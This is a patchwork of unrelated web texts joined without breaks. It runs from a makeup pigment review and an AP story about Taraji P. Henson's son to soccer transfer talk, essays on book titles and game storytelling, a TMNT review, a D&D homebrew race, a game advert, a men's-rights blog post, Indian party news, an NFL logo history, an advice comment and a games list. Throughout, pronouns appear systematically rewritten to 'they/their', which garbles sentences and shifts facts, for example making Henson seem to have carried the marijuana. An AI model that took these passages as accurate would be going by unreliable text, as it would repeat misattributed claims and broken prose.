This shop and these pigments are the first that I have tried from an etsy seller. I have had them for about a year or so and have loved them from the start. I have a few that I did repurchase the full size of, because I was so in love with the colors! This will be a 3 to 4 part series, because I have around 11 or 12 shades and I would like to save my last post to show you the bases that I like to have certain ones over and some looks using them! The first 2-3 will be only swatches and product photos! I hope you guys enjoy this series, if so I would not mind doing another indie company, someone you guys might be interested in, soon after!
Here we go:
Shamrock
Swatches from left to right: Bare skin, Wet, Over NYX Jumbo Pencil in Milk
Shamrock is one of my favorite shades of green, which is a bright grass green, but trying to swatch it just does not give the pigment justice. It is hard to place on and if you just swipe this color it does look patchy and uneven, but I have found with most of the matte shades in Madison Street Beauty's shop that patting them on is the best way to apply them, like with most pigments I have used. Applying them in this manner also intensifies the color and cuts down on fall out on your cheeks! They also apply and look best wet and also applied over a base.
Pumpkin
Swatches from left to right: Bare skin, Wet, Over NYX jumbo pencil in milk
Pumpkin, along with most all of the other metallics/shimmers that I own from Madison Street Beatuy, perform the best straight from the container. This one is this orangey/bronze/copper tone with a high metallic feel. Over a base the color becomes a more deep bronze/copper and it looses some of the shine, at least over NYX milk.
Tropical
Swatches from left to right: Bare skin, Wet, Over NYX jumbo pencil in milk
As you can see this one is another matte and it is a bright blue green leaning towards a turquoise. This shade actually performed better than Shamrock in the swatches, but it still looks and applies better wet and over a sticky base. This is actually one of my most used shades out of the pigments I have!
Gold Leaf
Swatches from left to right: Bare skin, Wet, Over NYX jumbo pencil in milk
This is by far my favorite pigment of all time, not just from this shop. The color, the intensity, the application. I have never seen another shade like this before. This one applies best over a sticky base, I prefer NYX jumbo pencil in Black Bean which I will show you in my last post. Gold leaf is a deep true gold shade, but over NYX milk it looks almost muted and looses some of the shine that it has. If you only own one pigment in your collection, this one should be it.
I hope you liked my first set, looking forward to doing the rest. As always if you have any questions at all, just ask!
Kristyn ❤
Shop: http://www.etsy.com/shop/MadisonStreetBeauty
Advertisements
Associated Press
LOS ANGELES — Actress Taraji P. Henson has apologized to police in the Southern California city of Glendale for accusing an officer of racially profiling their son.
Henson posted a statement on Instagram Friday afternoon, hours after the Glendale Police Department released video of a traffic stop of the actor' son that showed the officer respectfully dealing with the 20-year-old.
"A mother's job is not easy and neither is a police officer's," Henson wrote on the social networking site. "Sometimes as humans we overreact without gathering all the facts. As a mother in this case I overreacted and for that I apologize.
"Thank you to that officer for being kind to my son," Henson wrote.
Henson accused a Glendale police officer of profiling their son in an interview with Uptown magazine.
The Los Angeles Time obtained the video of the October traffic stop of Henson's son, Marcell, for driving through a lighted crosswalk while a pedestrian was walking in it.
Henson acknowledged they had marijuana in their backpack and was cited for having it without a valid prescription. The officer did not cite them for the traffic violation, but confiscated the marijuana.
The "Empire" star said in the interview their son was also racially profiled by an officer at the University of Southern California and that prompted them to transfer to Howard University in Washington, D.C.
Henson said their son was stopped on the Los Angeles campus "for having their hands in their pockets."
Henson's apology Friday did not mention USC.
USC Public Safety Chief John Thomas wrote in a statement earlier this week that they wanted to discuss the allegations with Henson, but the school had no update Friday on whether that conversation had occurred.
Thomas wrote they were racially profiled as a teenager and was "deeply disturbed" to learn that Henson's son felt profiled because of their race.
Copyright 2015 The Associated Press
Never a team to let an opportunity pass them by without at least finding out the cost, it appears as though the Seattle Sounders are entering the fray for Sacha Kljestan's rumored arrival to MLS.
I'm hearing Seattle #Sounders have approached Montreal about moving up in allocation rankings. Seattle could make a play for Sacha Kljestan — Ives Galarcep (@SoccerByIves) January 14, 2015
This is obviously far from a done deal, but a move like this would make sense from the Sounders' perspective. Kljestan has been used primarily as a central midfielder at Anderlecht -- filling more of a box-to-box role -- but he's also experienced in wide positions. In some ways, Kljestan is a similar player to Brad Evans, albeit more offensive minded. As a central midfielder, he'd likely fill a role similar to the one played by Gonzalo Pineda, farther up the field than Osvaldo Alonso but not quite a No. 10.
Kljestan has fallen out of favor at Anderlecht this season, but is only a year removed for an 11-goal campaign that included three goals in Champions League play. He's also 46 international caps and four international goals on their resume.
Beyond their playing abilities, Kljestan also has at least one strong personal connection to the Sounders. They and Evans are good friends, dating back to their time on the PDL's Orange County Blue Star. Evans and Kljestan were also teammates on the 2005 U20 World Cup team that was coached by Sigi Schmid.
While it plausible enough that the Sounders would be interested in acquiring Kljestan, the big question is "what would it take to get him?" The Sounders are just one of several teams interested in trading into the Impact's Allocation Ranking spot, with the Philadelphia Union, New York Red Bulls and LA Galaxy all rumored to be inquiring as well. The Galaxy actually tried to sign Kljestan last year, and were reportedly close to finalizing a deal, until teams ahead of them in the Allocation Ranking effectively blocked the move.
All of this interest suggests the Impact are in a strong position from which to deal. Chances are they'd be looking for a player and probably some Allocation Money.
In a hotel in Louisville once, I overheard the guests in the lift. They were attending the Kentucky state convention of colonic hydrotherapists. At the time, I wondered: What do they do in their hotel rooms between sessions?
Last week I wondered if I could get them into joint session with the American Publishers' Association, whose members definitely need their colons washed out. I had been writing an essay for the Common Review in Chicago on second world war revisionism and had just finished the bibliography.
Check out some of the titles I cited. Clive Ponting's Armageddon: The Reality Behind the Distortions, Myths, Lies and Illusion of World War II; Nicholson Baker's Human Smoke: The Beginnings of World War II, the End of Civilisation; Patrick Buchanan's Churchill, Hitler and the Unnecessary War: How Britain Lost its Empire and the West Lost the World.
You will note: Notwithstanding the fall of empire, there is a rampant high tide of colonisation. You will also detect an agenda. These books are trying to tell or warn potential buyers that they will not be getting the conventional "good war" fought by the "greatest generation".
David McCullough's publishers felt no need to rename their book 1776: The War in Which the Brits May Not Have Been Quite as Evil and King George Not Quite as Tyrannical as Our School Histories and Walt Disney Told Us.
Colons have been a staple of academic publishers for many years. After all, no academic ever lost tenure by stinting on words. Certainly, with some published theses you get the impression that the academic assessors weighed them in the balance – literally. And their titles reflect it. Now they have colonised even popular non-fiction titles like those above, and I can testify that publishers adorned my own books with subtitles. They felt that short, pithy titles like The Alms Trade, Rum or Deserter all needed a mini-foreword to be pinned to them.
Indeed, word is that the internet is making it worse. Publishers want to put as many keywords in the title as possible to get the click-on traffic for online buyers. However, this expansion used to be mostly for non-fiction titles. Now Nicholson Baker is breaking the boundaries. Their Human Smoke tries to get the best of both worlds, a creative Dos Passos cut-and-paste-style work masquerading as history. Most historians, even tendentious ones, may have mentioned Hitler's part in declaring war on the US. Baker's addition of the colonial subtitle lends a spurious historicity and academic rectitude to their polemic, while dangerously introducing the colon to creative works. Think of what would have happened to George Orwell's snappy title. 1984: One Man's Discovery that Big Brother is Indeed Big but Hardly Fraternal and that Sex with Comrades Can Have Torturous Consequences. You can forgive Herman Melville for adding "or, The Whale", to Moby Dick, since, firstly it has no colon, and secondly, when they published it no one would have had a clue what it was all about. However, Moby Dick: How Ishmael Lost Their Shipmates and Found Their Soul While Chasing Jungian Archetypes Around the Globe and Carrying Out Experimental Marine Mammal Research, does not really cut the wasabi for the sushi. Better still, imagine trying to get a plot summary behind a colon for one of Dickens's discursive novels, or for that matter, imagine summarising War and Peace in a snappy subtitle. No, it's all gone too far. We must all cleanse our colons.
The War of the Stories - Emergent vs. Linear Storytelling
Roger Ebert, the arch-critic of Hollywood, was a man who disliked the idea of videogames being an artistic form. They described the act of playing a game as “a loss of those precious hours we have available to make ourselves more cultured, civilized and empathetic”. Ebert took umbrage to the idea that a game's story can affect a person. To him, player agency was a key factor in the demotion of games from art to consumable. You're effectively moving a chess piece, so why should you care about it? A game of chess is never anything more than victory or defeat, it's not about how many pieces you lost on the way.
As a writer, or at least someone delusional enough to call themselves a writer, I'm obsessed with that storytelling mantra of show, don't tell. Interpretation, not exposition, is king. Give someone a set of tools or a blank canvas and let them create, instead of simply revealing to them a finished spice rack or painting. Reader impression is such a powerful tool that whole character belief systems can be drawn up along with it. Think about the unreasonable uproar when J. K. Rowling announced Dumbledore was homosexual - people had created in their minds a version of the character so unique to them that the revelation gave them a jolt.
This individual creationism is what fans of emergent gameplay point to as an example of how great videogame storytelling can be. You need only ask someone who has lost an entire squad in XCOM to see the frustration in their eyes. To you, they would just be pawns in a larger march towards victory, but to that person those squad members had been allies and compatriots with hours of investment.
Emergent stories will always be hard-hitting for the player, as they are the ones experiencing it. There is always something thrilling and exciting about being part of a unique moment, something that potentially no-one else on the planet has experienced within that game. It's a personal journey - one that, when trying to explain it to others, however, loses its touch.
Storytelling, after all, is based around shared human experience. There's a reason that the Greek gods of ancient times were a bunch of catty, capricious and vindictive whiners: because people are, too. Having shared experiences, feelings and emotions with the characters in a story creates an emotive bond that steers the story. A figure like Ezio Auditore is liked because he's a rogue but, through words and deeds, shows that they have a heart of gold underneath. Corporal Smith, who ran out in front of a dozen aliens and was rightly shot down for it, does not have this same depth.
This is where emergent gameplay can fall short. Encounters and random events in videogames on their own don't constitute an overarching narrative - they're nothing more than a series of unrelated occurrences. A story is more than just a string of set pieces - it's a reaction to those events. Those reactions are potentially where Telltale went so right with The Walking Dead and where Bioware perfected their craft in Star Wars: Knights of the Old Republic, Dragon Age and Mass Effect. All offer character-driven narratives where the choices a player makes (the set-pieces) create ripples upon which others (your companions) can react.
There are games that try to replicate this to some effect. My beloved Football Manager, which takes up far too much of my life, attempts to have your players react to the treatment of others. Yet, after a few seasons you quickly learn what responses will placate them and move on with more important things - like buying every promising young footballer in Brazil. At the end of the day, linear narrative gives the characters in a story the necessary background to, in turn, give the player a gauge on their personality, likes and dislikes.
A linear story also allows for higher investment in other factors of development. Half-Life 2, probably the king of the linear games, used highly-detailed face models on its characters to better express their feelings. This created a memorable cast that left an impression on its players and the gaming industry as a whole. Half-Life 2 also creates another perfect example of linear narrative that isn't tied to its characters: Ravenholm. Before going to the doomed mining town, the player is given so many clues as to its fate that by the time they set foot into its zombie-infested streets they're already terrified.
There are some games that manage to bridge the gap between emergent and linear. Valkyria Chronicles gives the player a core set of characters but also randomly generates other combatants. All of these come with their very own traits - one may like the desert and hate grasslands, another may get a combat bonus when fighting in city streets or alongside someone from the same race. In the same vein the game even tackles racism by having stat penalties when racists fight alongside the culture they hate.
The endless stream of participants in an emergent game like XCOM is in itself a hindrance to the emergent style. If you're playing it Ironman mode and not reloading every save after a favourite soldier dies, there will be a constant stream of new recruits for you to invest your time into again. The pain of loss is there, but it's never long-lasting, the feedback loop of recruit-veteran-death repeats ad infinitum and the only real incentive after some time is to keep veterans alive because their abilities are useful.
Compare this to the stories of Lee Everett from The Walking Dead, Mordin Solus from Mass Effect, John Marsden from Red Dead Redemption or even Soap McTavish in Call of Duty Modern Warfare. Players connect with each other through their shared experiences with the characters on screen. There's a reason that, despite it being a blocky mess of outdated graphics, gamers still become emotional when they re-watch or re-play the final moments of Aeris in Final Fantasy VII.
Through moments with these characters we create the polar opposite of what Roger Ebert called “a loss of those precious hours”. Despite what they opined, narrative storytelling creates an atmosphere in which we can become more cultured, more civilised and more empathetic. That shared human experience is what makes gaming a special medium, more so than film and television. It's what makes it an art.
Teenage Mutant Ninja Turtles (1990)
There was once a time when I thought this movie, Teenage Mutant Ninja Turtles was the greatest martial arts movie of all time.
I was 6, and I had just walked out of the cinema in awe. Hey, it was the highest grossing independent film of all time making over $133 million in the box office!
Now in adulthood I thought it's time to revisit what was quite possible the first seed in my passion for martial arts! At least until I discovered the inspirational Bruce Lee (who made is named through Golden Harvest, who also produced this film!).
So the movie begins telling the tale of a massive rise in crime throughout New York City. Mysterious robberies, and theft without any eye witnesses are becoming more and more common, but one reporter, April O'Neill has done their research. April believes it could be a Ninja organisation from Japan known as ‘The Foot'
After a day of work they are mugged outside near their truck, when suddenly the street light is smashed and the muggers are defeated and tied up before police arrive. This is when we meet the Teenage Mutant Ninja Turtles! A group of 4 humonoid turtles mutated from a type of radioactive ooze when they were younger.
Of the 4 there is Leonardo – the most mature of the team who tends to be the leader – they carry two Samurai style katanas and wears a Blue headband. Donatello who uses their bow staff and wears a purple headband.  They are a bit of a joker (as opposed to a brainiac as in the cartoons) and tends to spend a lot of time conversing with Michaelangelo – who is the clown of the group. They wear an orange headband and uses a pair of nunchakus to fight their opponents. Finally we have Raphael, who wears a red headband and uses their Sai's against their enemy.
Raphael is the most angry of the group, and the only one returning form their ‘first battle' (saving April) as they lost one of their Sai's in the fight, and watched April pick it up and put it in their bag. From that moment they have a feeling of being incomplete and becomes extremely angry with themselves and the world.
They follow April in hopes of being able to get their Sai back, when they are attacked by the foot. They save them from harm, gets their Sai back but is forced to bring their home as they are unconscious. They awaken, learns of the Turtles and their mentor Splinter before the foot return and tell their master Shredder about these ‘freaks of nature' interfering with their business.
Naturally Shredder sends out their foot soldiers lead by Tatsu to capture the turtles but they instead end up kidnapping Splinter. From there both sides fight against each other as the Turtles try to get back their master with the help of April and their new friend – the Hockey mask wearing Casey Jones.
This is an advertisement
It's still pretty damn cool.
Although dated, this movie stands the test of time.
Unlike most kids movies TMNT has a dark and serious tone to it to compliment the light hearted nature of the turtles. They all face their emotions and the fear of being without a father figure when Splinter is kidnapped. But the deepest character in the film would have to be Raphael.
Raphael is the most angry of the 4 brothers. Splinter works with them to channel is anger but fears for their future, telling them that ‘Anger clouds the mind, turned inward it is an unconquerable enemy' and that as they face their anger, not to forget their family.
They face their own demons before having to deal with the loss of Splinter, not knowing if they are alive or dead. They challenge Leonardo's leadership decisions and goes off before being attacked by a small army of foot soldiers which lead them to serious injury. The other 3 turtles then must come to terms with the possible loss of Raphael, not knowing how serious their condition is.
Of course upon awakening the 4 team up again and summon the strength to return in search of Splinter.
Meanwhile Splinter meets a young boy named Danny, who has run away from home. Splinter offers Danny a friendly ear to hear about their problems. While Danny doesn't share their thoughts they find a friend in Splinter, who shares their wisdom and their story which eventually turns them away from the violent path of the foot.
The serious tone and dark nature of the film is backed up by some very real and well thought out situations. While it has it's moments of cheesiness the movie's tone more than compensates.
The Action & Martial Arts
It's a combination of decent martial arts movement, ‘ninja-turtle-ish' fighting & comedy.
They have spread comical moments throughout the film in the fight scenes to appeal to the younger audiences of the time. The ‘Wheel of Fortune' when Michaelangelo spins on their shell knocking soldiers off their feet and Donatello Skateboarding through the sewers knocking out baddies with their bo staff really keep the spirit of the Teenage Mutant Ninja Turtles very family friendly while still offering decent snippets of action.
There are serious moments in the film that demonstrate authentic martial arts movements and techniques – Raphael's fight on the rooftop shows a few good moves while Michaelangelo's Nunchaku battle with the foot soldier is pretty cool.
My only complaint is that they weren't able to use the ninja weapons to their full ability due to the ‘family friendliness' of the film, relying more on hand-to-hand techniques while merely holding the weapons.
Perhaps the most emotional driven and entertaining fight is between the Turtles and Shredder. The turtles each have their turn at Shredder, losing rather quickly. They then conclude that they must know where Splinter is which leads to some very vicious fighting between the Turtles and Shredder displaying emotion and determination previously unseen by the Turtles in this movie.
This is an advertisement
Overall the style of the film makes for some decent action, especially for a kids film.
Do I Recommend it?
I watched this movie remembering what I saw as a kid, so I didn't expect some of the dark and serious tone of the film – I was pleasantly surprised with a well thought out movie that really caters for audiences of all ages. It may not be the best film of all time, but if you saw it as a kid, watch it again – you may be surprised too!
If you didn't watch this as a kid, I'm very in the middle – check it out and decide for yourself!
Viperines
"Lost the power of your gaze, fiend?", the priest cried, their holy symbol gripped in their outstretched hand.
Cursed Origins
"I am not what you think I am, human," the half-woman replied, their serpent hair rearing back in a visible display of irritation."You are a twisted beast, suffering penance for the sins of your mothers until such time as God's light redeems you," they grinned cruelly as they readied their hammer, "I am that light.""So be it. Though it is you who will meet God today, as all the rest have," they said simply, drawing their blade and steeling themselves to the task of creating another martyr to ignorance."Spawning from the unholy union of men and medusas, vicious snake haired monsters cursed by the very gods, Viperines are serpent like people with a frightening visage. Viperines carry their mother's monstrous natures, but the indomitability of their human parentage.
Spawning from the often unholy union of men and medusae, Viperines are serpent-like humanoids with a frightening visage. They bear the vestiges of their mother's terrible curse, and the indomitability of their father's human spirit.
Cunning and Guarded
Due to the nature of their appearance, Viperines are often feared and reviled by most. This constant icy reception has led to their mistrust of others, and a need to rely on one's own wit and intellect rather than the warmth or kindness of others. This upbringing causes numerous Viperines to grow into the roles related to the world's underbelly such as assassins, thieves, spies and cutthroats.
Viperine Names
Viperines raised within the societies of their human fathers will be named according to their customs, while those that live among their beastial mothers will be named vicious and cruel things to reflect their darker, cursed existence.
Adonia, Nagina, Ethelinda, Ninia, Stheno, Despina, Nikoleta, Vipera, Melusine, Echidna
Viperine Traits
Adrastos, Taipan, Natrix, Nagendra, Evander, Hyperion, Ophion, Tefnut, Ratall, Euryale
Viperines share certain racial traits as a result of their cursed heritage.
Ability Score Increase. Your Dexterity score increases by 2, and your Intelligence increases by 1.
Age. Viperines mature at the same rate as humans and live up to 200 years.
Alignment. Viperines may not have a tendency towards evil but many of them end up there. Evil or not, their scheming nature inclines many Viperines towards a lawful alignment.
Size. Viperines are about the same size and build as humans. Your size is Medium.
Speed. Your base walking speed is 30 feet.
Viper's Resilience. You have poison resistance.
Darkvision. Due to your beastial nature, you have superior vision in dark and dim lit places. You can see in dim light within 60 feet of you as if it were bright light. and in darkness as if it were dim light. You can't discern color in darkness, only shades of gray.
Serpent's Sting. When you take the attack action you may use your serpentine hair to deliver a bite attack. This attack deals 1d6 piercing damage. The ability modifier for this attack roll is Dexterity.
Paralyzing Gaze. You know the acid splash cantrip. Once you reach 3rd level, you can cast the spell disguise self once per day as a 2nd level spell. Once you reach 5th level, you may also cast the spell hold person once per day. Your spellcasting ability modifier for these spells is Intelligence.
Illustration by Ironshod.deviantart.com
Homebrew by Dicebound.tumblr.com
You Still Won't Make It… but you are welcome to try! By the makers of Karoshi and They Need To Be Fed, the sequel to the well received “You Probably Won't Make It” is finally out! A platformer game designed to be soul-crushingly challenging and frustrating, You Still Won't Make It is a game that's sure to reduce your lifespan by at least a few years…
Featuring 72 impossible levels, fine tuned graphics and audio (headphones recommended), plus a double jump mechanic designed to make levels harder: jump, run, float, and die (plenty of times), as you attempt to escape from a mysterious house of death. You probably won't make it… and we can't accept any responsibility for bodily harm, or physical damage to your computer. So play it if you dare!
Now, for the price of a coffee at your favourite overpriced coffeeshop, you can enjoy many hours of blood-boiling frustration with You Still Won't Make It! (From the press? Check out the press kit!)
Please download the demo to ensure your system is compatible before purchasing. Thanks!
Buy now! Tips appreciated. ♥
♫ Get the soundtrack and support our musician!
Game Features:
Over 50 soul crushingly hard levels (with a promise to add more via updates)
soul crushingly hard levels (with a promise to add more via updates) Game features and level designs developed to challenge (and rage)
Double jump mechanic for pixel perfect jumps
A gorgeous graphical and audio experience, headphones recommended!
Gamepad support
Guaranteed updates with new levels/features/etc.
Acclaim!
Awards: YoYo Games ‘Win Big' Competition (2013): Runner-up.
“You Still Won't Make It is the kind of indie game you're going to hate while you fall in love with it.” –JayIsGames
“Vetra Games has crafted a fantastic platformer.” – IndiePowerMag
“Everything about this game… I know I keep saying it… it has a really really decent atmosphere, they've really thought of everything…” –GMNewsBite
“This house of death is kitted out with giant fans to float along, spikes laid down on every possible surface and collapsing platforms hovering above them, so it's very likely you're going to die…a lot.” –IndieStatik
Acclaim for the original game:
“It's platforming at its most hardcore – exact jumps, double-jumps and spike-avoidance, with each foul-up throwing you back to the start of the increasingly brutal levels.“ -Rock Paper Shotgun
Screenies & Music:
The gender egalitarian masculist movement is tiny.
By “gender egalitarian,” I mean “believes men and women are more similar than they are different and fights against the sexist institutions and cultural narratives that try to make them more different than they are, while avoiding being racist, homophobic, transphobic, classist, ableist, etc. and not advocating violence, hate or stereotypes against a particular group.” And, unfortunately, there are not nearly enough of them fighting for men's rights.
For instance, consider r/MensRights, the largest men's rights group on Reddit. They have recently appointed AnnArchist as a new mod. They have a history of transphobia, advocating murder and violence, calling women “cum dumpsters” and “shrews” and bragging about “persuading” women into sex with them after they say no. In addition, they are a member of the r/beatingwomen subreddit. I feel it is not too much to ask that members of a gender egalitarian movement not find beating people of a particular gender hilarious. That is, like, the bare minimum requirement.
All too often, the mainstream men's rights movement is not gender egalitarian at all. All too often, those of us who support equal rights for everyone– no matter what our differences in opinion– have found our voices drowned out by misogynistic, rape-apologist and frankly stupid asshats. That has to change.
One of NSWATM's biggest problems is its lack of inclusiveness. It'd be less of an issue if we were just one of a thousand truly gender egalitarian masculist blogs. If we didn't talk about the problem of male homelessness, then one of the other blogs would take of the slack. But NSWATM is one of a few voices in one very lonely wilderness. We have a responsibility to try to cover all the issues, as much as we can, and I worry about that. A lot.
But you know what? I'm upper-middle class, white and nineteen years old. There are things I cannot write about, because I don't know my shit. I can't talk about prison reform. I can't talk about growing up male in a working-class neighborhood, or about the intersection of masculinity and race. I don't know what it's like to be a construction worker or a logger. I can't talk about divorce or fatherhood. Sometimes I'm pretty sure the only things I'm qualified to talk about are suicidal depression and sex.
There has to be more than me.
So I'm asking you, everyone who's reading this: if you can write, write. It doesn't matter if you come from an MRA background or a feminist background or discovered NSWATM while searching for “i want to circumcise my uncircumcised anus without sergury.” (Yes, that is an actual search term.) All you have to do is not make jokes about beating people of a particular gender, and you will already be better than AnnArchist.
Radical feminists and MRAs, trans people and cis people, queers and straight people, white people and people of color, people of all social classes, people working on their PhDs in gender studies and people who've never read a bell hooks book, men and women and miscellaneous… it's time to write about men.
Critique our posts! Tell us where we're wrong! Write about the things we're not qualified to write about, or about the issues we've overlooked! Cover angles we haven't thought of! Make us irrelevant! I'm begging you, come up with such brilliant theory that NSWATM seems as out-of-date, as full of mistakes, as completely missing the point as The Feminine Mystique.
Because only then– only when NSWATM is a half-forgotten trivia question– will we have a movement. A living movement. A movement that can change the world.
Aam Aadmi Party today expelled its senior leader from Amritsar Upkar Singh Sandhu over alleged anti-party activities, a day after they criticised the decision to make Sangrur MP Bhagwant Maan, the party Punjab unit chief.
Sandhu, who had unsuccessfully contested for Amritsar Lok Sabha seat by-poll, had yesterday opposed the decision of the party high command to appoint Mann as the convenor for the party's Punjab unit.
Sandhu has been expelled for their activities against the party, Mann said today in a statement.
Mann said that the volunteers were the backbone of the party, but added that anti-party activities would not be tolerated.
Sandhu had resigned from SAD on October 24 last year, to protest sacrilege incidents in the state. They had joined the party back a month later. Before joining AAP, Sandhu had defected to the Congress from SAD.
Yesterday, Sandhu had condemned the party high command's move appointing Mann as the state chief saying that it would lead to conflict among volunteers.
Sandhu said that AAP high command should consider appointing MLA Sukhpal Singh Khaira as party's state chief.
Earlier on Monday, in a meeting chaired by Delhi Chief Minister Arvind Kejriwal, the AAP had appointed Mann as the convener and party MLA from Sunam, Aman Arora as the co- convener.
Shortly after the decision, AAP spokesperson and the chief whip of the party in the state Assembly, Khaira had asked Kejriwal to remove them from the posts.
"I have asked (Arvind) Kejriwal to remove me from the posts of the party's chief whip in the Assembly and party spokesperson with immediate effect," the Bholath MLA had said.
A week before the Super Bowl, the Carolina Panthers revealed a logo redesign, the team's first since its inception in 1995. The new Carolina Panther, according to the team's press release, is more "streamlined" and "aggressive," while fans shrugged and said, "Sure, I guess."
This is what almost every NFL team with an animal mascot has done in the last 15 years: discarded the traditional logo for something more streamlined and pissed-off-looking. Long before Angry Birds became a smartphone phenomenon, it was a trend on NFL helmets. Let's take a walk through design history.
1996: Philadelphia Eagles
For most of the franchise's history, the logo has been a green eagle clutching a football in its talons. This changed in the mid-'90s, when someone decided that the face of the franchise should be more pissed off, and not have wings or talons. "Zoom in on that eagle's face! I want an angry, disembodied head!" The team's traditional kelly green was also dumped for a darker green and more black highlights, because GRRRR DARKER COLORS.
Side note: The design implemented in 1969 lasted only three years, at which point the team went back to a variation of the 1948 logo. Probably because it looked a hell of a lot like Nazi propaganda.
1997: Denver Broncos
For decades, the Broncos had worn bright orange jerseys at home, with a secondary color of royal blue and a helmet logo that featured a poorly drawn horse firing some sort of steam laser (?) from its nose. There was, to say the least, room for improvement. I always felt the old bronco was a unicorn drawing gone awry -- like their horn of soft-serve ice cream just ended up in the wrong place.
Enter the navy blue stallion head with a flame-like mane and angry orange eyes. They need no steam puff from their nose to let you know that they are racing wild-eyed into their enemies, ready to stamp and bite their way to victory.
FACT: the Broncos won the Super Bowl the first two seasons they had the new logo and uniforms, and the graphic designers are widely believed to be the main reason for this. It had nothing to do with Terrell Davis.
1997: Miami Dolphins
Miami's helmet-wearing aquatic mammal was barely more than a silhouette since the team's inception, but that changed in 1997, when the dolphin gained distinct features in front of a simpler (and, once again, darker) sunburst. Let's zoom in:
The dolphin's brow is furrowed, and the mouth has a slight but definite downward turn. Sorry, children: Flipper is scowling. And why not? The Dolphins logo is already riddled with nonsense, it may as well look mad about wearing a helmet that covers its blowhole -- a helmet without a facemask that is NOT EVEN A DOLPHINS HELMET. C'mon, the dolphin should be wearing a Dolphins helmet.
Much better. Now let's animate it! Click for seizures:
1999: Baltimore Ravens
The Ravens used the shield with wings for the first two years of their existence, but they dropped it because it was stolen without credit from a security guard/amateur artist who sued the team and won three dollars in damages. Yes, three dollars. That's when they turned to the NFL's go-to Plan B: Pissed-Off Bird Head.
2000: St. Louis Rams
The Rams adopted a new logo and color scheme immediately after winning the Super Bowl, which is the worst idea since stealing a security guard's idea for a logo. The Greatest Show on Turf would never match that championship over the Titans, and the Rams have now missed the playoffs for seven straight years. But hey, at least the new ram looks mad.
2002: Seattle Seahawks
The Seahawks got a makeover when they moved into Seahawks Stadium, later re-named for various telecommunications companies. The original logo was a fair representation of an eagle totem of the Pacific Northwest's indigenous tribes. It was somber, perhaps even grim, with an air of stoic sadness -- a strikingly accurate representation of Seattle fandom, actually. It could only have been improved by a single tear:
Instead, the Seahawks went the same way as the rest of the NFL: more aggressive with darker colors. And if the furrowed bird-brow and sharpened beak weren't enough to make this clear, NFL Properties' in-house design team also gave them a nice forward lean -- like the designer made a few tweaks, then hit "control+i" to italicize it.
2003: Atlanta Falcons
The first two iterations of the Falcons logo was a stupid bird: tiny dead eye, mouth slack. The most recent iteration gives us most of the tweaks we've seen in other modern redesigns: sharper beak and talons, squinting eyes, the italicized lean. Also, in what may be the only hint of clever subtlety in this entire article, the light gray outline highlights that the new falcon is a stylized F.
2005: Arizona Cardinals
By the year 2005, four of the NFL's five bird-mascot franchises had redesigned their logos to make their token birds look angrier. "Sure, us too" said the Cardinals. Boom! Darker colors, furrowed brow, frownier beak, et cetera.
HISTORIC TREND: The Cardinals and Seahawks, the NFC West's two bird teams, both lost their first Super Bowl appearance to the Steelers four years after their logo redesign. Coincidence? Absolutely.
2009: Detroit Lions
The Lions logo had been a blue silhouette of a Lion since 1970. Following their infamous 0-16 season in 2008, the Lions gave their lion teeth and a squinty eye -- the eye of the tiger, perhaps? -- which resulted in a leap to 2-14. The organization has since turned it around, though, with a high-powered offense and fearsome defensive line. In fact, if trends continue, they'll lose the Super Bowl to the Steelers next year :(
What's next?
Fourteen of the NFL's 32 teams are represented by an animal: the Cardinals, Falcons, Ravens, Panthers, Bears, Bengals, Broncos, Lions, Colts, Jaguars, Dolphins, Eagles, Seahawks and Rams. (The Chargers don't count because they chose to shift away from horses and towards electricity; the Bills' animal mascot is actually the name of its city; and Texans are technically humans, although barely.) Since 1996, 10 of those 14 have redesigned their logos, and in each case the result has been a more aggressive animal. So who's left, and what's next?
*"Right to Bear Arms" logo comes from Ben Walker. See more of their art at www.benwalkerart.com
I went to the NFL's headquarters to learn more about the logo design process -- and to pitch my ideas to their creative team. It made for a fun video:
I still haven't heard back from them, though. They probably just misplaced my card.
I've done so many embarassing things in my day. Way worse things have been said about me than this. Here are a few things to think about:
1st off, truth be told, if you were a "gorilla" they wouldn't have continued to sleep with you. They obviously found you attractive or it would have stopped after the 1st time.
2nd, I hate to sterotype, but your hair (on your head) is probably to die for. Indian women have the most gorgous hair. So you have a little extra body hair than most. No one is perfect. I'd rather have good head hair. Everyone sees your hair everyday. So it comes with a little extra body hair, that's really a small price to pay. Most men won't even notice to be honest. Most men will just be grateful your having sex with them. (If you're really insecure about it look into laser hair removal, it'll thin it out and isn't super duper expensive. But again, I don't think it's necessary. Please don't let this one guy shatter your confidence).
3rd off, This is what frat boys do. It's disgusting but you're not the only girl they are talking about. They probably all tell stories and your fwb decided to talk about you to fit in. Basically he's a loser but the point is there are tons of girls being talked about, your not alone.
3rd off, your value doesn't come entirely from your looks. It comes from your brain, your accomplishments, your academic success, your relationships with other people. Looks are really a small part of it. Really. I can get almost any guy I want. And its not because I look like a Victoria's Secret model. I don't at all. I'm chubby to be honest. But i can get almost any guy because I worked very hard at school and because I've carved out a very successful life for myself. Focus on crafting a good life not on crafting your appearance. Im not sure if youre aware of this or not but after college frat guys arnt that cool anymore.
4th off, don't go for the popular guys. Try the kinda shy not so popular guys. You know, the nerdy ones you may have friend zoned. They arnt cool, but they treat you like a queen. They genuinely think youre the best thing in their world. They'll go to the moon and back for you. They are the ones that have a clue. And they won't give af if someone said you look like a gorilla and had anal with them. They'll judge the asshole that said that, not you. Anyone that judges you for it isn't worth having in you're life.
KEEP YOUR HEAD HELD HIGH. I know the feeling you're feeling. It will pass in time. I promise.
2013 was an amazing year for games - but can 2014 top it? There were so many games to be excited for, so we ran a toplist to see which ones got you guys excited the most. And after over 500,000 votes, you told us which ones were the 25 that you were most anticipating. So, here they are, along with some SUPER EXCITED tweets to illustrate how pumped you should be for another year of too many videogames.
25. Mad Max
Even if it sucks, I am freaking out about this MAD MAX game releasing in April. Vehicular combat!? Open world!? Yes! Yes! Yes! -- Trevor Schoenfeld (@Schofizzy) January 8, 2014
Mad Max video game #FUCKYESS!!!!! -- JimBad The Sailor (@jimmyrivait94) January 8, 2014
24. Wolfenstein: The New Order
#Wolfenstein: The New Order ...I think its just going to be singleplayer no multiplayer :( still going to get it, looks good. -- Luke Vizzicks (@VizzickX) January 7, 2014
23. No Man's Sky
No Man's Sky http://t.co/FkZzVHILKy HOLY. FUCKING. SHIT. TAKE MY MONEY DAMN YOU! -- Chenzo (@1Chenzo) January 2, 2014
